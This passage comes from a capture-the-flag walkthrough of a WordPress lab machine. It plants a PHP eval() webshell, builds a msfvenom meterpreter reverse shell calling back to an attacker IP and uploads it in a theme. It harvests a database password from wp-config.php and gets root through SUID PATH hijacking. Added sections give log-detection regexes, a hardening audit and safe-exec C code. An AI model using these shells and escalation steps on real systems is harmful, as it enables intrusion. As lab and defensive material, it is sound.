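    # Constructed values: the password used in the walkthrough and its MD5 in both cases.
    lower = "e10adc3949ba59abbe56e057f20f883e"
    upper = lower.upper()
    print("lowercase MD5 accepted:", wp_check_password("123456", lower))   # True
    print("uppercase MD5 accepted:", wp_check_password("123456", upper))   # False
    # Salt taken from the post's re-hashed value; the output can be compared with it.
    fresh = phpass_hash("123456", "7xTzj.pl")
    print("phpass form:", fresh, "accepted:", wp_check_password("123456", fresh))
```

Note that hmac.compare_digest is used for the comparisons, matching PHP's hash_equals, so the check does not leak how many leading characters matched.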

Log in again:

  1. User: admin
  2. Password: 123456

[screenshot: login successful]

OK!!!

Login successful!!!

Let's continue.

 

6. getshell

The usual ways to get a shell:

  1. Upload a webshell
    1. a one-liner webshell
    2. an image webshell
    3. ...etc.
  2. Modify existing data so that it becomes a webshell
  3. ...etc.

When we have no idea, we can search online and see whether anything gives us inspiration.

We find that we can:

  1. upload a one-liner webshell
  2. upload an image webshell
  3. upload a file
  4. edit the theme directly
  5. ...etc.

So let's use the editing method.

1. Theme editor (failed)

1.1 Write the shell

Appearance -> Theme Editor

Pick any spot and write in a one-liner:

```
<?php eval(phpinfo());?>
```

[screenshot: editor]

Save after writing it.

But where is this file's path???

This is where our earlier scan comes in handy:

```
[+] WordPress theme in use: twentyseventeen
 | Location: http://sunset-midnight/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-08-11T00:00:00.000Z
 | Readme: http://sunset-midnight/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 2.4
 | Style URL: http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
```

Hmm... it does not seem to have found any php files. Are they blocked???

Let's try visiting the file we just edited:

```
http://192.168.83.145/wp-content/themes/twentyseventeen/comments.php
```

Access failed.

1.2 Analysis

But on second thought: we just edited the theme, and the theme is what gets rendered on the pages, and what we edited was the comments template.

So why not go to the front end and see whether it took effect? Besides, comments.php looks like it is about discussion,

so it is most likely the comment section,

and there is a comment section under the posts!!!!

So!!!!! GO~GO~GO, let's look.

Result: found on the post page!!!

[screenshot: shell]

1.3 getshell

Use a tool to connect to the shell we wrote.

Here I am using AntSword (蚁剑).

[screenshot: failed]

What on earth is this data!!

The connection must have failed,

so we have to start over!

 

2. Plugin editor

2.1 Write the shell

Likewise, find the plugin editor module and pick a plugin to edit.

Write in the one-liner:

```
<?php eval($_REQUEST[1]);?>
```

[screenshot: writing the shell]

Then click Update File to save it.

2.2 Visit it

The file is hello.php,

so let's try visiting it:

```
http://sunset-midnight/hello.php
```

We get

oh no

OOPS! THAT PAGE CAN'T BE FOUND.

Don't panic.

Let's try passing a parameter:

```
http://sunset-midnight/hello.php?1=phpinfo();
```

[screenshot: phpinfo output]

Wow!!!!!

It seems to have worked.

So, next:

2.3 getshell

Use the tool AntSword.

Add an entry:

  1. URL: http://sunset-midnight/hello.php (the shell's address)
  2. Connection password: 1 (the parameter we set earlier)

[screenshot: connect]

The connection test succeeds, so we add it and open it.

[screenshot: success]

Connected successfully!!!

Got a shell!!!!
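Seen from the defender's side, everything done so far leaves traces in two logs: the wpscan password attack is a burst of POST requests to /wp-login.php (or /xmlrpc.php) from one source address, the hydra run is a series of "Access denied" warnings in the MariaDB error log, and the eval() backdoor shows up as PHP source inside a query string (and because an active plugin is loaded on every WordPress request, that parameter works on any path, which is why a 404 page still executed it). The script below is an added example, not part of the original post: it parses constructed Apache access-log lines and MariaDB error-log lines in those formats and flags all three patterns. The thresholds, the sample timestamps and the 192.168.83.140 source address are assumptions, and it assumes MariaDB is logging failed logins to its error log (log_warnings set high enough).

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache "combined" log format; only the fields needed here are captured.
APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# MariaDB error-log line for a failed login (present when log_warnings is high enough).
DENIED_RE = re.compile(r"Access denied for user '(?P<user>[^']+)'@'(?P<host>[^']+)'")
# WordPress endpoints that accept credentials.
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}
# PHP source tokens that have no business in a URL query string.
PHP_CODE_RE = re.compile(r"\b(phpinfo|eval|system|passthru|shell_exec|exec|assert)\s*\(", re.I)


def parse_apache(lines):
    """Yield one dict per well-formed access-log line; unparseable lines are skipped."""
    for line in lines:
        m = APACHE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        path, _, query = rec["target"].partition("?")
        rec["path"], rec["query"] = path, unquote(query)
        yield rec


def login_bursts(records, threshold=20):
    """Source IPs with more than `threshold` POSTs to a login endpoint -> {ip: count}."""
    counts = Counter(r["ip"] for r in records
                     if r["method"] == "POST" and r["path"] in LOGIN_PATHS)
    return {ip: n for ip, n in counts.items() if n > threshold}


def code_in_query(records):
    """Requests whose query string looks like PHP code -> [(ip, path, query)]."""
    return [(r["ip"], r["path"], r["query"]) for r in records if PHP_CODE_RE.search(r["query"])]


def mysql_denied_bursts(lines, threshold=10):
    """(user, host) pairs with more than `threshold` failed logins -> {(user, host): count}."""
    counts = Counter()
    for line in lines:
        m = DENIED_RE.search(line)
        if m:
            counts[(m.group("user"), m.group("host"))] += 1
    return {key: n for key, n in counts.items() if n > threshold}


# --- constructed sample data (not real captured logs) ---
ATTACKER = "192.168.83.140"
ACCESS_LOG = [
    '192.168.83.1 - - [16/Aug/2020:17:10:02 +0800] "GET / HTTP/1.1" 200 10321',
    '192.168.83.1 - - [16/Aug/2020:17:10:03 +0800] "GET /wp-content/uploads/ HTTP/1.1" 200 2210',
] + [
    f'{ATTACKER} - - [16/Aug/2020:17:16:{i:02d} +0800] "POST /wp-login.php HTTP/1.1" 200 4870'
    for i in range(30)
] + [
    f'{ATTACKER} - - [16/Aug/2020:17:17:{i:02d} +0800] "POST /xmlrpc.php HTTP/1.1" 200 403'
    for i in range(5)
] + [
    f'{ATTACKER} - - [16/Aug/2020:18:02:11 +0800] "GET /hello.php?1=phpinfo(); HTTP/1.1" 404 95213',
    "garbage line that does not parse",
]
MARIADB_LOG = [
    f"2020-08-16 17:20:{i:02d} {9540 + i} [Warning] Access denied for user 'root'@'{ATTACKER}' (using password: YES)"
    for i in range(12)
] + ["2020-08-16 17:21:00 9553 [Warning] Access denied for user 'wp'@'localhost' (using password: NO)"]


def run_detections(access_lines=ACCESS_LOG, mariadb_lines=MARIADB_LOG):
    """Run all three checks and return their findings in one dict."""
    records = list(parse_apache(access_lines))
    return {
        "login_bursts": login_bursts(records),
        "code_in_query": code_in_query(records),
        "mysql_denied": mysql_denied_bursts(mariadb_lines),
    }


if __name__ == "__main__":
    for name, finding in run_detections().items():
        print(f"{name}: {finding}")
```

The login-burst count deliberately adds wp-login.php and xmlrpc.php together, because wpscan can switch to the xmlrpc attack (see --password-attack in the help output above), and a rule that only watches wp-login.php misses it.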

 

3. Fix the admin's data

3.1 The original user data

Now we can restore the administrator's password.

The user's original data:

  1. User: admin
  2. Password: $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/

So we log in to the database and update it.

3.2 Update the user data

```
MariaDB [wordpress_db]> update wp_users set user_pass='$P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/' where user_login='admin';
Query OK, 1 row affected (0.002 sec)
Rows matched: 1  Changed: 1  Warnings: 0
```

Update complete.

Let's check that it changed:

[screenshot: update]

It matches the original data. All done!
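Three settings decided how far this chain could go: MariaDB listening on the network (port 3306 reachable, so the root password could be brute-forced remotely), the dashboard file editor being available (the backdoor was written through Plugins -> Editor, which define('DISALLOW_FILE_EDIT', true) in wp-config.php removes), and directory listing on wp-content/uploads (Apache's Options -Indexes turns it off). The audit below is an added example, not part of the post; it checks those three settings in wp-config.php, a MariaDB server config file and an Apache .htaccess, using constructed file contents inline. Whether an absent bind-address means "all interfaces" depends on the distribution's packaged defaults, so the script reports it as something to verify rather than as a confirmed exposure.

```python
import re

# WordPress: define('DISALLOW_FILE_EDIT', true); hides Appearance/Plugins -> Editor.
DISALLOW_EDIT_RE = re.compile(
    r"""define\s*\(\s*['"]DISALLOW_FILE_EDIT['"]\s*,\s*(true|false)\s*\)""", re.I)
# MariaDB/MySQL: bind-address (or bind_address) inside the [mysqld] section.
SECTION_RE = re.compile(r"^\s*\[(\w+)\]")
BIND_RE = re.compile(r"^\s*bind[-_]address\s*=\s*(\S+)")
# Apache: "Options -Indexes" disables directory listings.
INDEXES_RE = re.compile(r"^\s*Options\b.*?([-+])Indexes", re.M | re.I)


def check_wp_config(text):
    """Finding string, or None when DISALLOW_FILE_EDIT is defined as true."""
    m = DISALLOW_EDIT_RE.search(text)
    if m and m.group(1).lower() == "true":
        return None
    state = "set to false" if m else "not defined"
    return f"wp-config.php: DISALLOW_FILE_EDIT {state}; the dashboard theme/plugin editor is available"


def mysqld_bind_address(text):
    """bind-address value from the [mysqld] section, or None if it is not set there.
    Values in other sections (e.g. [client]) are ignored on purpose."""
    value, section = None, None
    for line in text.splitlines():
        s = SECTION_RE.match(line)
        if s:
            section = s.group(1).lower()
            continue
        b = BIND_RE.match(line)
        if b and section == "mysqld":
            value = b.group(1)
    return value


def check_mysql_config(text):
    """Finding string, or None when the server only listens on loopback."""
    addr = mysqld_bind_address(text)
    if addr in ("127.0.0.1", "::1", "localhost"):
        return None
    if addr is None:
        return "mysql: no bind-address under [mysqld]; verify the packaged default (may listen on all interfaces)"
    return f"mysql: bind-address = {addr}; the database is reachable from the network"


def check_htaccess(text):
    """Finding string, or None when 'Options -Indexes' is present."""
    m = INDEXES_RE.search(text)
    if m and m.group(1) == "-":
        return None
    return "apache: no 'Options -Indexes'; directory listings such as /wp-content/uploads/ may be enabled"


def audit(wp_config, mysql_cnf, htaccess):
    """Run all checks; returns the list of findings (an empty list means all three are hardened)."""
    checks = (check_wp_config(wp_config), check_mysql_config(mysql_cnf), check_htaccess(htaccess))
    return [finding for finding in checks if finding]


# Constructed sample inputs: a weak set resembling this machine, and a hardened set.
WEAK_WP_CONFIG = "<?php\ndefine('DB_NAME', 'wordpress_db');\n/* That's all, stop editing! */\n"
WEAK_MYSQL_CNF = "[mysqld]\nuser = mysql\nbind-address = 0.0.0.0\n"
WEAK_HTACCESS = "RewriteEngine On\n"
HARD_WP_CONFIG = "<?php\ndefine( 'DISALLOW_FILE_EDIT', true );\n"
HARD_MYSQL_CNF = "[mysqld]\nbind-address = 127.0.0.1\n"
HARD_HTACCESS = "Options -Indexes\nRewriteEngine On\n"

if __name__ == "__main__":
    for finding in audit(WEAK_WP_CONFIG, WEAK_MYSQL_CNF, WEAK_HTACCESS):
        print("[!]", finding)
    print("hardened set findings:", audit(HARD_WP_CONFIG, HARD_MYSQL_CNF, HARD_HTACCESS))
```

None of these settings would have stopped the database password from being weak, but each removes one hop of the path used above: no remote 3306, no in-browser file editor, no browsable uploads directory.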

 

7. getshell-反弹shell

前面getshell成功的话可以直接看第8步

1. 制作反弹shell

1.1 搜索payloads

开启msf

  1. root@For-Fun:~# msfconsole
  2. IIIIII dTb.dTb _.---._
  3. II 4' v 'B .'"".'/|\`.""'.
  4. II 6. .P : .' / | \ `. :
  5. II 'T;. .;P' '.' / | \ `.'
  6. II 'T; ;P' `. / | \ .'
  7. IIIIII 'YvP' `-.__|__.-'
  8. I love shells --egypt
  9. =[ metasploit v5.0.101-dev ]
  10. + -- --=[ 2048 exploits - 1105 auxiliary - 344 post ]
  11. + -- --=[ 562 payloads - 45 encoders - 10 nops ]
  12. + -- --=[ 7 evasion ]
  13. Metasploit tip: You can use help to view all available commands
  14. msf5 >

显示payloads

  1. msf5 > show payloads
  2. .......
  3. 289 php/bind_perl manual No PHP Command Shell, Bind TCP (via Perl)
  4. 290 php/bind_perl_ipv6 manual No PHP Command Shell, Bind TCP (via perl) IPv6
  5. 291 php/bind_php manual No PHP Command Shell, Bind TCP (via PHP)
  6. 292 php/bind_php_ipv6 manual No PHP Command Shell, Bind TCP (via php) IPv6
  7. 293 php/download_exec manual No PHP Executable Download and Execute
  8. 294 php/exec manual No PHP Execute Command
  9. 295 php/meterpreter/bind_tcp manual No PHP Meterpreter, Bind TCP Stager
  10. 296 php/meterpreter/bind_tcp_ipv6 manual No PHP Meterpreter, Bind TCP Stager IPv6
  11. 297 php/meterpreter/bind_tcp_ipv6_uuid manual No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
  12. 298 php/meterpreter/bind_tcp_uuid manual No PHP Meterpreter, Bind TCP Stager with UUID Support
  13. 299 php/meterpreter/reverse_tcp manual No PHP Meterpreter, PHP Reverse TCP Stager
  14. 300 php/meterpreter/reverse_tcp_uuid manual No PHP Meterpreter, PHP Reverse TCP Stager
  15. 301 php/meterpreter_reverse_tcp manual No PHP Meterpreter, Reverse TCP Inline
  16. 302 php/reverse_perl manual No PHP Command, Double Reverse TCP Connection (via Perl)
  17. 303 php/reverse_php manual No PHP Command Shell, Reverse TCP (via PHP)
  18. 304 php/shell_findsock manual No PHP Command Shell, Find Sock
  19. ......

里面东西多,但是按序排列,找起来比较容易

我们要找的是php编写的,反弹shell

  1. 299 php/meterpreter/reverse_tcp manual No PHP Meterpreter, PHP Reverse TCP Stager

 

1.2 Check the options

Select the payload and view its options

  msf5 > use php/meterpreter/reverse_tcp
  msf5 payload(php/meterpreter/reverse_tcp) > options
  Module options (payload/php/meterpreter/reverse_tcp):
  Name Current Setting Required Description
  ---- --------------- -------- -----------
  LHOST yes The listen address (an interface may be specified)
  LPORT 4444 yes The listen port
  msf5 payload(php/meterpreter/reverse_tcp) >

It needs LHOST and LPORT configured, namely

  lhost: the attacker machine
  lport: the port (any free port)

 

1.3 Generate the shell

Use msfvenom to generate the payload file

  root@For-Fun:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.83.140 lport=8888 -o shell.php
  [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
  [-] No arch selected, selecting arch: php from the payload
  No encoder specified, outputting raw payload
  Payload size: 1115 bytes
  Saved as: shell.php
  • msfvenom: the tool
  • -p: the payload to use
  • lhost: attacker IP
  • lport: listening port
  • -o: output file

Generated

Now that it is generated, we can either upload it or copy its contents and paste them into an editable file

First we need to start the listener

 

1.4 Start the listener

Use the handler module exploit/multi/handler

  msf5 > use exploit/multi/handler
  [*] Using configured payload generic/shell_reverse_tcp
  msf5 exploit(multi/handler) >

Set the payload

  msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
  payload => php/meterpreter/reverse_tcp

Check the options

  msf5 exploit(multi/handler) > options
  Module options (exploit/multi/handler):
  Name Current Setting Required Description
  ---- --------------- -------- -----------
  Payload options (php/meterpreter/reverse_tcp):
  Name Current Setting Required Description
  ---- --------------- -------- -----------
  LHOST yes The listen address (an interface may be specified)
  LPORT 4444 yes The listen port
  Exploit target:
  Id Name
  -- ----
  0 Wildcard Target
  msf5 exploit(multi/handler) >

The settings must match the ones used when generating the payload, otherwise the handler will never receive the connection

  msf5 exploit(multi/handler) > options
  Module options (exploit/multi/handler):
  Name Current Setting Required Description
  ---- --------------- -------- -----------
  Payload options (php/meterpreter/reverse_tcp):
  Name Current Setting Required Description
  ---- --------------- -------- -----------
  LHOST 192.168.83.140 yes The listen address (an interface may be specified)
  LPORT 8888 yes The listen port
  Exploit target:
  Id Name
  -- ----
  0 Wildcard Target
  msf5 exploit(multi/handler) >

Run it

  msf5 exploit(multi/handler) > exploit
  [*] Started reverse TCP handler on 192.168.83.140:8888

 

2. File upload

2.1 Modify the admin data

As before, we directly modify the administrator's data in the database and restore it afterwards; the steps are the same as above, so they are skipped here

2.2 File upload

Browsing the admin panel shows that themes can be uploaded, so let's try uploading our payload

Result

The upload failed

Some kind of filtering must be in place

It turns out an archive has to be uploaded

2.3 File upload, second attempt

Try a compressed file

It turns out the archive extension is restricted too; rename it to .zip and upload again

Result

Blocked

Fine, let's just download a theme from the official site and put our payload inside it

2.4 File upload, final attempt!

After downloading it, open the archive and drop the payload file in

Added

OK, it's in place, let's upload!!!

The result.......

This.....

It says the uploaded file is too large.......

Fine, you win

I'll go and download a smaller one then!!!!

2.5 File upload, the real final attempt!

Download a small theme and put our shell inside

Small one

Upload it again

Upload

Upload successful!!!!

Finally!!

 

3. Access the file

Access the shell.php we uploaded

  http://192.168.83.145/wp-content/themes/hemila/shell.php
  • Uploaded theme: hemila
  • File: shell.php

Result

getshell

Reverse shell received!!!!

 

4. getshell

Check whether we actually have a shell

  meterpreter > shell
  Process 7962 created.
  Channel 1 created.

Looks like it worked

Spawn a proper TTY and see which directory we are in

  python -c 'import pty;pty.spawn("/bin/bash")'
  www-data@midnight:/var/www/html/wordpress/wp-content/themes/hemila$

ok

It works!!!

getshell!!

 

5. Restore the user data

Restore the user's password

Same steps as above

 

8. Privilege escalation

Continuing from step 7: reverse shell

The steps after step 6 are much the same; just use a tool to connect, and the rest is similar

1. Check privileges

Let's look at the current user

  www-data@midnight:/var/www/html/wordpress/wp-content/themes/hemila$ whoami
  whoami
  www-data

Result

www-data

www-data user (the web server's default user and group, nginx here), low privileges

So we need to find a way to escalate

2. Check the users

Let's see which users exist

  www-data@midnight:/var/www/html/wordpress/wp-content/themes/hemila$ cat /etc/passwd

Users

  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  bin:x:2:2:bin:/bin:/usr/sbin/nologin
  sys:x:3:3:sys:/dev:/usr/sbin/nologin
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/usr/sbin/nologin
  man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
  systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
  systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
  systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
  messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
  avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
  jose:x:1000:1000:jose,,,:/home/jose:/bin/bash
  systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
  sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
  mysql:x:107:115:MySQL Server,,,:/nonexistent:/bin/false

Findings (UID 1000 is the first manually created user account)

  root:x:0:0:root:/root:/bin/bash
  www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  jose:x:1000:1000:jose,,,:/home/jose:/bin/bash

There is a user called jose

3. Search the filesystem for jose

Grep around and see whether there is any useful information about jose

  www-data@midnight:/var/www$ grep -r "jose" ./
  grep -r "jose" ./
  ./html/wordpress/wp-config.php:define( 'DB_USER', 'jose' );
  ./html/wordpress/wp-content/plugins/akismet/readme.txt:Contributors: matt, ryan, andy, mdawaffe, tellyworth, josephscott, lessbloat, eoigal, cfinke, automattic, jgs, procifer, stephdau

Oh, found something

  ./html/wordpress/wp-config.php:define( 'DB_USER', 'jose' );

It is in wp-config.php, so let's see whether there is anything else in there

  www-data@midnight:/var/www$ cat ./html/wordpress/wp-config.php
  cat ./html/wordpress/wp-config.php
  <?php
  /**
   * The base configuration for WordPress
   *
   * The wp-config.php creation script uses this file during the
   * installation. You don't have to use the web site, you can
   * copy this file to "wp-config.php" and fill in the values.
   *
   * This file contains the following configurations:
   *
   * * MySQL settings
   * * Secret keys
   * * Database table prefix
   * * ABSPATH
   *
   * @link https://wordpress.org/support/article/editing-wp-config-php/
   *
   * @package WordPress
   */
  // ** MySQL settings - You can get this info from your web host ** //
  /** The name of the database for WordPress */
  define( 'DB_NAME', 'wordpress_db' );
  /** MySQL database username */
  define( 'DB_USER', 'jose' );
  /** MySQL database password */
  define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );
  /** MySQL hostname */
  define( 'DB_HOST', 'localhost' );
  /** Database Charset to use in creating database tables. */
  define( 'DB_CHARSET', 'utf8' );
  /** The Database Collate type. Don't change this if in doubt. */
  define( 'DB_COLLATE', '' );
  /**#@+
   * Authentication Unique Keys and Salts.
   *
   * Change these to different unique phrases!
   * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
   * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
   *
   * @since 2.6.0
   */
  define('AUTH_KEY', '9F#)Pk/=&SyQ/>UVRBXx$}e&>G@(+m6L|_{Emur&fv&fO_+wbJ`-6QnE_7hI|Y<p');
  define('SECURE_AUTH_KEY', 'p#Eh5#4W~p4-Iue2M)H/?[dp`BS;$7o~Kb%F?&S-Zv=rH#;U%`9G#VR`l^,8j$M+');
  define('LOGGED_IN_KEY', '0{YUw?X%j+ej-0du&FW@QkVP?b(#QsQfu[Q%<QS_Lpc1UI1|st:EJr)d*$g/iJ18');
  define('NONCE_KEY', '%)thH*l;)A^S#8WQ!8TKAnQ;uNXNKv<f.|PyYijgztda70y-4m~DTyqr^X!$JwX#');
  define('AUTH_SALT', '<Kd5.3^|yo:/fw2Y|PTb4!bU~5uRv7Z(n0;~jOXoO7MC]j/ICu[tY!)g4Oah-{oa');
  define('SECURE_AUTH_SALT', 'dmYQvQ1Ap&z~JUHUaKR6]<rm7^ydGAp(/EH&+vrAi6cBpi?F7XKTc@Ahm:|h*wR;');
  define('LOGGED_IN_SALT', '5+Iw-;-j+2rD3WgRtSM`!zDb5I%LLU0]Awk-Cma:f4xrJv%k~/@+TthXY_[JpjfK');
  define('NONCE_SALT', 'iDo3}y9z;@c~a)ZLT:7|.ZCp-0sK4>T1p&%MhGt_TUu+HFpPjn-no`:8sI0BA);y');
  /**#@-*/
  /**
   * WordPress Database Table prefix.
   *
   * You can have multiple installations in one database if you give each
   * a unique prefix. Only numbers, letters, and underscores please!
   */
  $table_prefix = 'wp_';
  /**
   * For developers: WordPress debugging mode.
   *
   * Change this to true to enable the display of notices during development.
   * It is strongly recommended that plugin and theme developers use WP_DEBUG
   * in their development environments.
   *
   * For information on other constants that can be used for debugging,
   * visit the documentation.
   *
   * @link https://wordpress.org/support/article/debugging-in-wordpress/
   */
  define( 'WP_DEBUG', false );
  /* That's all, stop editing! Happy publishing. */
  /** Absolute path to the WordPress directory. */
  if ( ! defined( 'ABSPATH' ) ) {
      define( 'ABSPATH', __DIR__ . '/' );
  }
  /** Sets up WordPress vars and included files. */
  require_once ABSPATH . 'wp-settings.php';

Oh, found it

jose

4. Decrypting the data

  /** MySQL database username */
  define( 'DB_USER', 'jose' );
  /** MySQL database password */
  define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );

The password is 32 characters long, so it may be an MD5 hash (or it may not be hashed at all)

Try to crack it and see whether it comes out

Result

Failed

Hmm.........

So let's just try switching to the user directly

5. Switch user

  • User: jose
  • Password: 645dc5a8871d2a4269d4cbe23f6ae103
  www-data@midnight:/var/www$ su jose

Success

So it really was not hashed, just a plaintext password, heh

Try sudo for privilege escalation

  jose@midnight:/var/www$ sudo su

Failed

The jose user does not have sudo rights

So we need another way to escalate

Next, let's look at SUID binaries; that may turn something up

6. Find files with the SUID bit

SUID stands for Set owner User ID upon execution. It is an attribute Linux gives to executable files: a program with the bit set runs with the privileges of the file's owner rather than those of the user who started it

  • find: search for files
  • /: start from the root directory
  • -perm: match on permission bits
  • -u=s: the SUID bit is set
  • -type f: regular files only
  • 2>/dev/null: discard error output by sending it to /dev/null
  jose@midnight:/var/www$ find / -perm -u=s -type f 2>/dev/null
  find / -perm -u=s -type f 2>/dev/null

Search results

One rather unusual file shows up

  /usr/bin/status

7. status

Try running it

  www-data@midnight:/var/www$ status

Result

status

So can it be exploited?

A quick search shows it can be exploited through the PATH environment variable

8. Environment variable

That is, modify $PATH

1. Check the environment variable
  jose@midnight:/var/www$ echo $PATH
  echo $PATH
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Since status calls the service command without an absolute path, we can put a directory of our own at the front of PATH so that our own service is the one that gets executed

But what if we have no permission to create files in the current directory?

Use the tmp directory (where temporary files go)

2. Create the service file

Change directory

  jose@midnight:/var/www$ cd /tmp
  cd /tmp
  jose@midnight:/tmp$

Create the file

  jose@midnight:/tmp$ echo "/bin/bash" > service
  echo "/bin/bash" > service
  jose@midnight:/tmp$ ls
  ls
  service
  jose@midnight:/tmp$ cat service
  cat service
  /bin/bash
  jose@midnight:/tmp$

OK, created

Grant permissions (read, write and execute), simply 777

  jose@midnight:/tmp$ chmod 777 ./service
  chmod 777 ./service
  jose@midnight:/tmp$
3. Add it to PATH
  jose@midnight:/tmp$ export PATH=/tmp:$PATH
  export PATH=/tmp:$PATH
  jose@midnight:/tmp$

Looks like it was added; let's check

  jose@midnight:/tmp$ echo $PATH
  echo $PATH
  /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Let's try running the program

9. Run

Run status

  jose@midnight:/tmp$ status

Result

root

root!!!!
Check the current user

  root@midnight:/tmp# whoami

root

Success!!!!

All done!!!!
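The escalation above works only because status resolves service through the caller's PATH. As an added example, not code from the box or from the original post, this is the pattern a privileged helper should use instead: execute its tool by absolute path under a fixed, minimal environment. The function names and the use of /bin/true are this example's own assumptions.

```c
/* Added example (not the box's /usr/bin/status): a setuid helper that runs a
 * system tool without trusting the caller's PATH. Names are illustrative. */
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Fixed search path for the child; the caller's PATH is never consulted,
 * so prepending /tmp as in the walkthrough has no effect here. */
#define TRUSTED_PATH "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

/* Accept only absolute paths with no ".." component. A bare name such as
 * "service" is rejected; that is the check status was missing. */
int is_absolute_trusted(const char *cmd)
{
    if (cmd == NULL || cmd[0] != '/') return 0;
    if (strstr(cmd, "/../") != NULL) return 0;
    size_t n = strlen(cmd);
    if (n >= 3 && strcmp(cmd + n - 3, "/..") == 0) return 0;
    return 1;
}

/* Minimal environment for the child: nothing inherited (no PATH, LD_PRELOAD, IFS). */
char **minimal_env(void)
{
    static char *env[] = { "PATH=" TRUSTED_PATH, NULL };
    return env;
}

/* Run abs_cmd with argv under the minimal environment. Returns the child's
 * exit status, or -1 if the path is rejected or the exec fails. */
int run_trusted(const char *abs_cmd, char *const argv[])
{
    if (!is_absolute_trusted(abs_cmd)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(abs_cmd, argv, minimal_env());
        _exit(127);                 /* exec failed: distinct status */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* /bin/true (assumed present) run the safe way; expected result 0. */
int demo_safe_true(void)
{
    char *argv[] = { "true", NULL };
    return run_trusted("/bin/true", argv);
}
```

With this pattern a writable directory at the front of the user's PATH changes nothing, and a rogue file named service in /tmp is never consulted.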
